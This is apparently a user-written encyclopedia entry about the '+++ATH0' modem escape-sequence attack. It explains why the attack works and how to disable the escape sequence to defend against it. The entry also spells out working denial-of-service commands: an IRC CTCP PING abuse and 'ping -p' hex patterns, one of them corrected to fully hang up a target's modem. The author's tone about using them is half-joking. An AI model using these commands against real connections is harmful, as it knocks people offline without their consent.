The modem control code for "disconnect" or "hang up". Some modems are foolish enough to interpret this as the software actually telling it to disconnect, and thus sending this string with a dialup modem will often result in you being knocked offline.

The problem was that the easily amused on IRC would abuse this by going into a populated channel that they thought was particularly lame, e.g. #windows, and typing

/ctcp #windows PING +++ATH0

...which would cause about 1/3 of the channel to spontaneously ping out, since IRC clients, on receiving a "PING" command, are supposed to echo back whatever string was sent with it (usually a timestamp).

People eventually got smart about it, and began hacking their modem scripts to ignore +++ATH0, as well as patching or scripting their IRC client to ignore messages containing this string. However, if you still wish to be nasty and denial of service attack someone with this, you need only get a Unix shell on a non-vulnerable connection and, do

ping -c 5 -p 2B2B2B41544829 <target IP address>

"2B2B2B41544829" being the hex code for the bytes spelling out +++ATH0. I don't recommend doing this. No, really, I don't. Heheh. Yes, I've had a cable modem since 1997 or so, why do you ask?

This attack works because the PPP driver expects the modem to pass the string "+++" unchanged to the other side, while the modem interprets it as the 'escape string' - a request to exit from data mode and accept a command. Once the modem is in command mode, the string ATH0 instructs it to hang up immediately1.

With most modern modems, it's easy to protect yourself from such an attack2. Almost all modems nowadays are Hayes compatible, and allow the user to remap the escape character using S register number 2. The escape string is always a sequence of three escape characters, but the escape character may be changed from the default of 0x2B ("+") to anything from 0x00 to 0x7F, by setting the S register to the decimal value of the required character. Decimal values of 128-255 disable the escape sequence completely.

Most PPP implementations do not use the escape sequence at all - to hang up the modem they drop the DTR signal, which (depending on the modem) is interpreted as a request to hang up or reset. Therefore, there is no loss of function in disabling the escape sequence on a modem that is used solely to access the internet.

To disable the escape sequence (and therefore protect your modem against this attack), add the string "S02=255" to the end of your modem's init string. If it has no init string set, use the string "ATS02=255".

In Windows NTs, the init string can be set in the device manager properties for the modem, under 'Advanced', 'Extra initialization commands'. In Windows 9xes, the init string can be set in the dial-up-networking properties for each connection, under 'Advanced Connection Settings', 'Extra settings'. Most unixes have a different way of setting the initialization string - have a look in the manual if you can't find it in the PPP configuration program.


1 - The attack, as stated above, does not actually hang up the modem. Modem commands must end in a carriage return character (0x0D). The above attack is arguably worse, as it leaves the modem in a state where attempts to re-dial or reset the modem may not work without human intervention. To ping a modem and hang it up, use "ping -c 5 -p 2B2B2B415448290D <target IP address>".

2 - Actual results of carrying out the ping exploit from a shell account to my (secured) dialup :

lj@warspite.inf.ed.ac.uk$ ping -c 5 -p 2B2B2B41544829 modem-2940.wolf.dialup.pol.co.uk
PATTERN: 0x2b2b2b41544829
PING modem-2940.wolf.dialup.pol.co.uk (81.76.139.124) from 129.215.32.201 : 56(84) bytes of data.
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=1 ttl=53 time=165 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=2 ttl=53 time=166 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=3 ttl=53 time=163 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=4 ttl=53 time=167 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=5 ttl=53 time=169 ms

--- modem-2940.wolf.dialup.pol.co.uk ping statistics ---
5 packets transmitted, 5 received, 0% loss, time 4040ms
rtt min/avg/max/mdev = 163.473/166.507/169.860/2.068 ms

Log in or register to write something here or to contact authors.